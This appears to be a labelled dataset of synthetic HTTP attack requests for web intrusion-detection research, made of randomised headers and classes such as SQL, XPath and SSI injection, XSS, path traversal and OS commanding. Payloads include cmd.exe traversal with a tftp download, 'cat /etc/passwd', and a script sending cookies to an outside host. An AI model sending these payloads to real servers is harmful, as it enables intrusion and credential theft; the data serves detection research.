~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38933
Start - Id: 49206
class: XPathInjection
GET /lpr5kdajeg8d/petxhTA0/hA.x47LCcLXKDrF@/2f3nesc/8SBbpiY9ba5J.tiff?5ThVzfcDkyu=kx72OSY1Z&Udaio2clti=24atsrua%27+++++or++++oxe%2Fiq5r%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D375%5D+++or+++++%27oerlg%27+%3D%27 HTTP/1.1
Host: www.dalf.com
Connection: close
Accept: audio/basic;q=0.7, image/png;q=0.3, image/png
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: b-a;q=0.4, etO-pjE;q=0.8, ukien7a-a5, t-ib
Cache-Control: max-age=059
Client-ip: 0.187.188.191
Cookie: M%uBV=oWjCVUhUs5l;jyeoTnmVguHdy=xgtylideNrea0;4lwVt.rG=Tn3Cqnlik
Cookie2: $Version="2"
Date: Sun, 18 Sep 05 15:30:10 GMT
ETag: W/"VPgxgmnVWqkN9G-YHD"
Expect: kwohSom
From: Gswzt6t2@seem.gov
If-Modified-Since: Tue, 13 Oct 09 23:18:33 GMT
If-Unmodified-Since: Mon, 02 Jun 08 23:20:41 CET
If-Match: "csPAXmiaHf_Gus0"
If-None-Match: *
If-Range: Thu, 24 Apr 08 20:09:51 CET
Max-Forwards: 3019
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Basic cHJybjo3b21JaXI=
Range: -392691
Referer: http://aten.net/p8th0e/408sefwe/2dah3mnx.txt
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/2.9 (X11; U; Linux i586 0.3; el-6e; rv:8.0.4) Gecko/51368073
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 8.2 25.152.84.181, 2.1 135.117.29.145, FTP/4.0 230.172.96.139
Transfer-Encoding: compress
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 738 www.iaeo.png "RrzpoiHnn" "Fri, 27 Feb 09 20:57:20 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49206
Start - Id: 41864
class: SqlInjection
GET /Ao7aWCexecQ33-/pE/imWBywH3d@0B-T/tu9dyQ_SQd/2gaFXSA/lL2R.9_q/9ezBcKetcFY/mh.cfm?UJTgI=4255&cmNOe=ncd&ui=sv9&gRrln3=iwphs&La=%3B+EXEC%28+%27INS%27%2B%27ERT++INTO+++users++++values%2883%2C%27eoPeyv%27%2C%27anthe7ic%27++++%29%29&r7d0uaoeaheaIOu=Onmgn HTTP/1.0
Host: 193.83.70.100:5
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.2, x-mac-ce;q=0.3, utf-7, windows-1250, x-mac-arabic
Accept-Encoding: identity, identity;q=0.6, gzip, gzip;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 205.53.108.147
Cookie: dnaeqDiQu=cn;h8rr=welsoaheo5cea;7sahmohe=ilp
Cookie2: $Version="72"
Date: Mon, 04 Sep 06 17:27:40 GMT
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: hbnaeaon=kuEqf
From: alubns@ssude.cz
If-Modified-Since: Thu, 30 Apr 09 10:46:23 CET
If-Unmodified-Since: Sat, 06 Sep 08 03:08:14 UTC
If-Match: "xaUZu4e300qoa_gd3qG"
If-None-Match: *
If-Range: Thu, 10 May 07 07:46:54 GMT
Max-Forwards: 3062
MIME-Version: 7.2
Pragma: s2fteeu=orslca
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: cerhke srest=lwcshsc
Range: -521,-331719
Referer: http://ia1scae.net/tonp6are/Endid/oshwi.php3
TE: gzip;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.8 (Windows; U; Windows NT 2.6; n5-us; rv:3.3.1) Gecko/07470084
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: FTP/6.8 www.Qnreyt.htm, HTTP/2.8 224.17.178.85
Transfer-Encoding: identity
Upgrade: i1en7/5.4, wsdt/7.7
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41864
Start - Id: 48858
class: XPathInjection
GET /hB3qvDrWaGb3cdPJ2PT/e10kBS/nSXtHcUd5Fuo6a7z/hsdai06em/Zlsc.js?32an1piii=bntri&updateAk99jq3=slAnn6%2Feoot%2Ft%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D54%5D+%7C+sh%2Faanc29%2FnO%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D296%5D++++or+%27ecn%27%3D+++%27&ViMKUH5=6oRgiStlgvNbewt&rei3hee=knnfLhb6&eoogtaqrav=296&ktgE=4%3Aadmin&gc1Of=e7cy HTTP/1.1
Host: 177.178.109.107
Connection: close
Accept: video/quicktime;q=0.9, text/plain, video/quicktime;q=0.0
Accept-Charset: iso-8859-4, iso-2022-jp, x-mac-hebrew;q=0.5, ks_c_5601-1987
Accept-Encoding: compress, deflate, compress;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 2.99.117.98
Cookie: 0mRsevgdttraAg=yBgC5vz;OucaEn9xMtshutdownn=47;Zi5xHF=2;he2=1;betdCH=nrsSVF1.
Cookie2: $Version="658"
Date: Thu, 02 Jun 05 05:20:40 GMT
ETag: W/".D0ehbAU9Y6-@zosB"
Expect: akafu79
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Wed, 10 Nov 04 17:17:37 UTC
If-Unmodified-Since: Fri, 28 May 04 09:28:46 GMT
If-Match: *
If-None-Match: "yGPXJDIkby_lr@n"
If-Range: "v6_T-IIM@@8@eSM"
Max-Forwards: 655
MIME-Version: 4.5
Pragma: s9l=yl7ph
Proxy-Authorization: NTLM a05vZXJvNWU1aHRyaGFzM21hblBscHNuZWliMmh0RXRp
Authorization: Digest opaque="aaem"
Range: 845-,90670-12915,351536-
Referer: http://www.m5rS1irt.uk/sagi/6l4O/Uehna.php4
TE: trailers
Trailer: Accept-Charset
User-Agent: tQKKCPLN_ http://www.fritei.st
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1420x8323
Via: 5.6 www.f5iV4.tiff, 9n6/8.5 70.204.245.100
Transfer-Encoding: identity
Upgrade: wrmk/0.8, tyuf/8.4, rih/4.1
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 186.251.4.115
X-Serial-Number: 177199337529573688
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48858
Start - Id: 44343
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: www.lqxn.biz
Connection: close
Accept: text/*, video/*, text/*
Accept-Charset: hz-gb-2312;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 231.246.74.85
Cookie: eoencoxteaYre=douj;7ciso9onq73tno=90783647
Cookie2: $Version="89"
Date: Sat, 31 Jan 09 12:37:30 UTC
ETag: "kwXTvO@4m-@MIi_"
Expect: 100-continue
From: Q0IEeur@zgehtbi59.uk
If-Modified-Since: Thu, 10 Mar 05 21:55:40 UTC
If-Unmodified-Since: Thu, 05 Jul 07 03:45:43 GMT
If-Match: "0Ed436M-Rj3k1HF1-n"
If-None-Match: *
If-Range: Fri, 09 Mar 07 22:55:02 UTC
Max-Forwards: 81
MIME-Version: 5.3
Pragma: Eiilnn='tisHs'
Proxy-Authorization: Digest nc=e078eCD8
Authorization: a9cb rpta8oc=nteya
Range: -4,7986-,046-946045
Referer: /aoeotg.js
TE: chunked,gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: tad8v (oDOJvVFOic; 7@vgTx57E-)
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: FTP/3.5 www.nzode.gif, FTP/8.8 6.128.212.140:7478
Transfer-Encoding: identity
Upgrade: ecbon/5.1, 0dstft/4.6, rh6g/9.8
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44343
Start - Id: 42990
class: OsCommanding
GET /5k.js?hspnr8jTeEboal=atss HTTP/1.1
Host: 252.28.64.61:64
Connection: dOmmDM
Accept: */*;q=0.7
Accept-Charset: x-mac-greek;q=0.1, x-mac-arabic, x-mac-chinesesimp, x-mac-arabic;q=0.1, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: tc9hjia=l3
Client-ip: 84.109.218.207
Cookie: 4Ry6eoo9himsAt=rm    -f   /tmp/9egh    |
Cookie2: $Version="767"
Date: Wed, 24 Jan 07 11:55:44 UTC
ETag: W/"kdLJHbutb6RMAdw2uu2"
Expect: ueTnll=noon
If-Modified-Since: Fri, 19 Aug 05 19:36:11 UTC
If-Unmodified-Since: Sat, 10 Oct 09 19:49:52 GMT
If-Match: *
If-None-Match: "OEa9xvHn4JNrwTLYEINJ"
If-Range: *
Max-Forwards: 5401
Proxy-Authorization: laahq noaeo=epl8
Range: -824908
Referer: /anre5Nj7/Cisnhwoi.php4
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/1.9 (Machintosh; U; PPC Mac OS X 4.9; sg-gk; rv:8.8.2) Gecko/16922581
Transfer-Encoding: compress
Upgrade: 5sZar/3.5, hg2/7.4, hai/2.7
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42990
Start - Id: 49889
class: XPathInjection
GET /t3sgivmwys/lO9/1Idtdmrlontdretvmh9a/snTubsmrt/etHbejaSoznla3mkone7/eTtibzwwkDxEZe_aE.cgi?yutuvanusni6Tl=Voa%27+or++1%3C++++a%2FN7%2Fx4t%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D7%5D+++++or++++%27Aisaes%27++%3D++++%27 HTTP/1.0
Host: 129.168.144.5:57886
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=65
Client-ip: 192.165.249.59
Cookie: x1bmauUisIFY=HiaYi3uEis;wRWB=17;lt=nculhS;lIzekroshoviln=ntsgxmlNeid>p2
Cookie2: $Version="614"
Date: Wed, 04 Feb 04 01:36:48 GMT
ETag: W/"79-wqobJXvLTgCDO1"
Expect: 3ms1era
From: ldlcym@E8Sinechia.ch
If-Modified-Since: Wed, 04 Mar 09 04:33:06 CET
If-Unmodified-Since: Sun, 08 Mar 09 04:38:33 CET
If-Match: "WotaI_7NSmjhHGH"
If-None-Match: "HImC579EhDlvpdI"
If-Range: Mon, 05 Apr 10 20:59:46 GMT
Max-Forwards: 6250
MIME-Version: 6.4
Pragma: hetuH='8erunlvr'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: /teutebiT/vs5Neew.aspx
TE: trailers
Trailer: Connection
User-Agent: eotz/1.4.6.6
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9591x1965
Via: 7.6 www.Adssrrw.js, 2.6 34.199.106.40
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 607 www.ihTevse4.js "aiSomhTteeigt" 
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49889
Start - Id: 49183
class: XPathInjection
GET /tEtosiotitLtjpevy/binHE/mnGQ811NAUqIjH2Qh.php4?ntltiqseMbno=qsadt%27+or+1%3C+++yqse%2Fnf%2Fil%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D44%5D++or+++++%27str%27+%3D+%27 HTTP/1.0
Host: 202.145.104.213
Connection: keep-alive
Accept: text/xml;q=0.8
Accept-Charset: iso-8859-7;q=0.4, iso-8859-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 192.197.118.16
Cookie: exdoltaskzHeaTa=565027;sth683h2jbosaa=ildPRA2@le0;otbwmghbsreiih=8692;hwt4il=otelnet<;SaanopcDeg4Ras=487826032;oamh6l=17
Cookie2: $Version="33"
Date: Mon, 13 Aug 07 04:02:21 CET
ETag: W/"YOmK8QeytA-289Ya"
Expect: 100-continue
From: ir0psea@aO25fruan.gov
If-Modified-Since: Mon, 31 Aug 09 03:45:58 GMT
If-Unmodified-Since: Sat, 24 Jun 06 14:14:35 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Mar 07 14:00:25 UTC
Max-Forwards: 9639
MIME-Version: 6.2
Pragma: vretceas=uufr
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: NTLM ZDB0NThybHNoMmFyZ2VIcmloaUVhWGVvb2VBbmNlbmVq
Range: 87-,-69535,7135-70843
Referer: /laeaia.wav
TE: trailers,gzip;q=0.2
Trailer: Date
User-Agent: Mozilla/9.7 (X11; U; Open BSD i586 5.7; eo-hN; rv:0.7.8) Gecko/56857016
UA-CPU: x86
UA-Disp: 577,972,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 400x881
Via: 5.9 1.255.10.84
Transfer-Encoding: gzip
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 858 www.efhrohf.jpg "oIntdrztcn98" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49183
Start - Id: 43055
class: OsCommanding
POST /FNeseile/e5eSA/gaoh2Srrroela7/1s/nATbeHhL0hhlu/uo2.cfm? HTTP/1.0
Content-Length: 87
Content-Language: Th,DtyIraw,n
Content-Encoding: identity
Content-Location: /kratr/escusdis.conf
Content-MD5: c294MjVOdG41cnRldGU3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Apr 10 16:30:08 UTC
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: www.5dunvqe1ro.st
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=5
Client-ip: 255.33.171.132
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="392"
Date: Sun, 14 Feb 10 20:05:21 UTC
ETag: W/"aH_FpQlYLtcbaU9x@"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Thu, 14 Jul 05 21:28:45 UTC
If-Unmodified-Since: Wed, 02 Nov 05 03:22:19 CET
If-Match: "xq-xA0QgKXNFJcwSct"
If-None-Match: *
If-Range: Fri, 07 Apr 06 12:26:30 CET
Max-Forwards: 6
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: NTLM NDVQeXNkaEh1OHNvdGttZTlpdnFhbW5pb25yamFueElvZmF0VXRvZGU0
Range: -324,1-544,8-732
Referer: http://9fne.net/aftNn.mpg
TE: trailers
Trailer: Accept
User-Agent: 5je7dfrsRnglrtmdfo
UA-CPU: 68000
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 7.8 www.Ttio1g.htm, FTP/1.2 www.T3ranl6r.css
Transfer-Encoding: deflate
Upgrade: tun3o/7.3, omna/4.0
Warning: 822 www.eio8o.jpg "ftuhtoaegstt66xnrce" "Tue, 28 Jul 09 22:26:56 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 13504238814
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iutaznrrnsdeh=iesd&09Mwi=jf3lYnldfih84eAtqi&eial3p1rhneHs=cat     /etc/passwd   |

End - Id: 43055
Start - Id: 44451
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ftoHoi.org:08
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-3;q=0.8, x-mac-icelandic;q=0.3, iso-8859-5;q=0.7
Accept-Encoding: 
Accept-Language: eshitr-wiku, AF-rdelldo, e-4reia3ur;q=0.2, r6-eso;q=0.4
Cache-Control: etayrLtI='afopEi'
Client-ip: 241.65.49.103
Cookie: te=491;Abkw=17
Cookie2: $Version="53"
Date: Sun, 03 Feb 08 21:47:49 UTC
ETag: W/"CA.F4LqzUCGLA1Nk"
Expect: Takeh8r
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Tue, 17 Aug 04 12:13:40 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 001
MIME-Version: 1.4
Pragma: h='t3tomb'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Basic d3JjTHplNnI6Z241c25l
Range: 6-02287,72753-
Referer: /ynoude6/eniaom.gif
TE: gzip
Trailer: Expect
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 4.0; rc-tt; rv:2.8.8) Gecko/78910713
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/1.2 103.185.139.157
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44451
Start - Id: 40657
class: SSI
GET /awtyxFwN0_5Bg6Ir8t/HY5admine/ligzetmE/5passthruxYhomeNm/aKH6sYe1D6239nlg/uURKH.nsf?r3opre=e%3C%27ndnse&no7=rR9l-e&di8jels=13570379&rzaFzhai4n=3900&Jlink-jU5rTZ_=4314744756&fxc4nTf=%3C%21--++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&ttmhcnaQayagea=13640884&8t=tlOHtdgl&kyu0=dOi1rlaa HTTP/1.1
Host: www.mrbshdhm.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, compress;q=0.6, identity;q=0.0
Accept-Language: *
Cache-Control: rEs=ahlhatt
Client-ip: 106.153.133.183
Cookie: Sprtqadrm0otEs=iwi;o9l4sd6oItT0u=ozUnVN.M98x;swset=955
Cookie2: $Version="6"
Date: Sun, 11 Jul 04 12:09:36 UTC
ETag: "Wx2dKH1wi9MYU.2"
Expect: 100-continue
From: mstnlt@azrx6.biz
If-Modified-Since: Tue, 10 Aug 04 02:38:44 UTC
If-Unmodified-Since: Sun, 16 Jan 05 09:52:37 GMT
If-Match: *
If-None-Match: "mbUBdyiFLE8akywo.bs"
If-Range: "KRQC289Z68WgMkPD2"
Max-Forwards: 6187
Pragma: sl=nG
Authorization: Basic YWFkbG5oTVE6dHRBMmVtcg==
Referer: /hiffi/hlw6ge/lila/8rs5t1/5kseh.html
TE: deflate;q=0.7,trailers,trailers
Trailer: From
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 1.4; Ss-dt; rv:2.1.0) Gecko/47988590
UA-Color: color32
Via: eat/9.3 144.172.138.204, zushoa/0.5 www.iyIbcnna.html, 8.1 www.nwOsEn.htm
Transfer-Encoding: gzip
Upgrade: o5x/8.1, nocyr/9.6, efmda/6.0
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40657
Start - Id: 46919
class: XSS
POST /im/tN4UWJWHkCzYodvu/i2r2/a0.BbC8PjKcBkdZtJ/@6.cgi? HTTP/1.1
Content-Length: 409
Content-Language: trehrl,ednEe
Content-Encoding: compress
Content-Location: http://www.t7ex.fr/witoue/ehts/rrIswTEt/k0bgsfc/tU7ce.dll
Content-MD5: bGxmdGNhaW9kZUlvc3Nucg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sat, 12 Mar 05 22:20:01 GMT
Host: www.io1ssajcht.it:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: windows-1258;q=0.9, iso-8859-4, euc-jp, windows-1254
Accept-Encoding: compress;q=0.3, gzip;q=0.2, identity;q=0.3, identity, compress;q=0.4
Accept-Language: abMP7tt-ge, ianasr-feisFhl
Cache-Control: only-if-cached
Client-ip: 67.18.221.141
Cookie: lnoSoz=netcatbuservicesy0n;eFmd8eNghaaebr3=n8ssgolih;wumaio6= l+mtc1e|s6;a5xa5t6t=1rL;usEn=uohUVo
Cookie2: $Version="1"
Date: Sat, 13 Dec 08 20:25:31 GMT
ETag: W/"GrP4IKP7N3PcZKc1rE"
Expect: 100-continue
From: nlqn@timuoEgjAR.ch
If-Modified-Since: Sun, 27 Jan 08 07:31:23 GMT
If-Unmodified-Since: Fri, 08 Oct 04 09:04:22 UTC
If-Match: "ifgnEX6zRgo.d-5uoS"
If-None-Match: *
If-Range: Sat, 16 Jan 10 13:23:59 CET
Max-Forwards: 782
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: cisore 8eMlkeoe=esttheee
Range: -790
Referer: http://bou4eBe.it/gotnhr/tAiiba/PwerlrE/5atd/wive.php4
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: n8y4bshray/9.7.7.0.7
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: eat/9.4 www.tn2hnr.jpg, FTP/9.3 53.118.0.195, mria/2.3 www.ezc1ww.tiff
Transfer-Encoding: gzip
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t1h=nssneris&ldwrW1=0abc&NtRe=oabt-tnl>x9usni&9.N3oPBallQvand-=aMteke&ywoIhtharp=O&iCehAortP=E8y4t&olin9nTr=at4a&nRrftthesa5Git=n$bf/td/hlink6 ?I&a1hotFsH=<!-- -- --><script >[document.location.replace   ('http://www.rasi.com/cgi-bin/iesieres.cgi'+document.cookie);]</script    ><!-- -- -->&tehtni1ce0t=h r7su&M&it0llot2=lYTFKJi8n&cAoeeoelencoooi=8T

End - Id: 46919
Start - Id: 35959
class: PathTransversal
GET /rnmsnesv6rneaa/i75eyoasrmoo/ltgs8eooresun3t/tej/9NQGsunion/FyeNoCF/uxvetcuahidos6c.png? HTTP/1.0
Host: 154.18.35.147
Connection: ktIrdi
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: ..\..\..\..\WINDOWS\system.ini
Accept-Language: hy-4t5uheo, ionnR8ok-nam;q=0.0, y-ainixh;q=0.7, 6qedi-z, mgsbee1-4rnera
Cache-Control: only-if-cached
Client-ip: 45.228.255.238
Cookie: cwtci=248577;8oA2mtgrrsrlera=142699524;EirUiu=rfwhere
Cookie2: $Version="3"
Date: Tue, 09 Oct 07 24:23:54 GMT
ETag: "004MLFVpUtRTgtN5"
Expect: 100-continue
If-Modified-Since: Tue, 05 Apr 05 22:44:30 GMT
If-Unmodified-Since: Fri, 25 Aug 06 08:36:49 CET
If-Match: "h-@rY-5ac96kTzn"
If-None-Match: "gdz52cR4yeh8XnVA7Ahf"
If-Range: Fri, 18 Feb 05 24:59:59 GMT
Max-Forwards: 4185
Proxy-Authorization: Digest uri=http://uaGoo.it/rdpke/rpaxore.msf
Authorization: Basic dWVpbXRhOG46YTRhYWVk
Referer: /QlrasISe.jpeg
TE: deflate,chunked;q=0.6
User-Agent: okgann (dXue6hVtd)
UA-OS: Linux
Via: HTTP/2.9 www.ot3turu.tiff
Transfer-Encoding: gzip
Upgrade: XetBas/4.5, eiTt/2.0
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 35959
Start - Id: 45069
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: 207.138.127.205
Connection: 9kfxello
Accept: text/html;q=0.0, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=85486
Client-ip: 4.109.212.12
Cookie: trptb=Pti jtanl;RYCVQYNOXVVt=fnirT6ctb t 8Eusr@iframeqs;ieanosoEwyrj3=ihfcoN;yrSe=8077760233;r5a3=4s
Cookie2: $Version="40"
Date: Mon, 15 Dec 08 01:29:50 UTC
ETag: "qWUh9tHs4AaboJ3l"
Expect: z4wo
From: feeaptn@RiywlCee.net
If-Modified-Since: Mon, 26 Apr 10 01:37:54 UTC
If-Unmodified-Since: Tue, 30 Nov 04 22:28:36 GMT
If-Match: *
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: "qU@ge.7zRiFICkqb"
Max-Forwards: 53
Pragma: uren=hno
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: 8eieo Eeeho=udaw
Range: 51016-,-10087
Referer: http://www.Eo9e.ch/so3tk/R2tkd/weit/Cgtteras.cgi
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.5 (Machintosh; U; PPC 4.9; ns-8e; rv:8.9.2) Gecko/73605201
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: r42/7.8, zsa7/0.2
Warning: 528 www.upne0nt.css "aiL0woeteemwnh" "Sat, 27 Sep 08 17:37:43 UTC"
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45069
Start - Id: 39946
class: SSI
POST /s9W8RHCwB-eyAiYvblN/_O_2q@ZYeEfn/AfjEedhitelsatn/qecsinputbkRzlibVP.g/h-4vbys1.oFWirk6SjA/tehosEnbefutisuebo/ll419eeoielonEa3/44p0PtelnetQYwdy3Iz/sjg_Sd0IuGe@-_fDXu7/acAUh4oAaVmj2xQxtxP.jpeg? HTTP/1.0
Content-Length: 300
Content-Language: shh,aA5o,hadRe
Content-Encoding: gzip
Content-Location: /uaat.png
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Sep 08 21:45:40 CET
Host: 105.83.4.106:80
Connection: close
Accept: application/x-tar;q=0.9, video/mpeg, video/*;q=0.6
Accept-Charset: iso-8859-9;q=0.6, windows-1254
Accept-Encoding: 
Accept-Language: srco-z, 9klTio-ain07sm, rpdk-sn, dooaee-eOd
Cache-Control: no-transform
Date: Mon, 06 Aug 07 02:38:10 UTC
From: uqnas8T@sof2ahapn.cz
If-Modified-Since: Sat, 28 Aug 04 16:40:01 CET
If-Range: *
Authorization: NTLM bHRpc3Rlc2VuTzJyaWN1bW50ZHlhcGxQM29hYWlzc29pdFVuTHlh
Range: -11132
Referer: /4doso/JPenszci.pdf
TE: gzip,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.5 (Windows; U; Win98 0.0; Ai-lo; rv:3.1.3) Gecko/06205215
Transfer-Encoding: identity
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ciitnAcbr=289462318&bg2xlggianisnja=h-56OysTp85&eNelikexH=s5\bperles&uena:l|eor&incqid=nineilo)$evalm6wo-JMa&klsertc=)'lc;loct nl"input8a"n&dcec=ektitrdiseniEonaz&sl3LaOehsE=<!  #<!--  #exec    cmd="id"-->&snrentoza9=asock_stream0DtetextermHn]&h91fsespd3=r

End - Id: 39946
Start - Id: 44489
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: 66.6.19.1:80
Connection: iSogtey
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.5, gzip;q=0.9, deflate;q=0.3, identity
Accept-Language: 8-Rcellon;q=0.8, akqntit-o1ae, qeek8-3oa;q=0.2, 5o-3ga;q=0.1, el-nhitua;q=0.4
Cache-Control: no-store
Client-ip: 20.163.26.161
Cookie: osgazerughwcu=nxsxzRHAGbdP;2e=18173305;ah62obctel=tbAJJAfT4zMN
Cookie2: $Version="7"
Date: Mon, 23 Aug 04 20:42:52 GMT
